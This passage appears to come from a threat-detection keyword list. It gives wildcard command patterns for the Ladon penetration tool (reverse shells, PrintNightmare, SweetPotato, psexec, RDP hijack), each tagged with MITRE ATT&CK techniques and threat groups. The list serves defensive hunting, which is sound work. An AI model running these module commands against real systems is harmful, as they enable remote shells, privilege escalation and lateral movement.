APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon netsh *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon noping *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Open3389*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon PowerCat *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon PrintNightmare*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon psexec*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon QueryAdmin*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RdpHijack*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ReadFile *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RegAuto*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ReverseHttps*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ReverseTcp *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RevShell-*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Runas*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RunPS *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon sc *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SetSignAuth*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SmbExec *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Sniffer*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SshExec *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SweetPotato*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 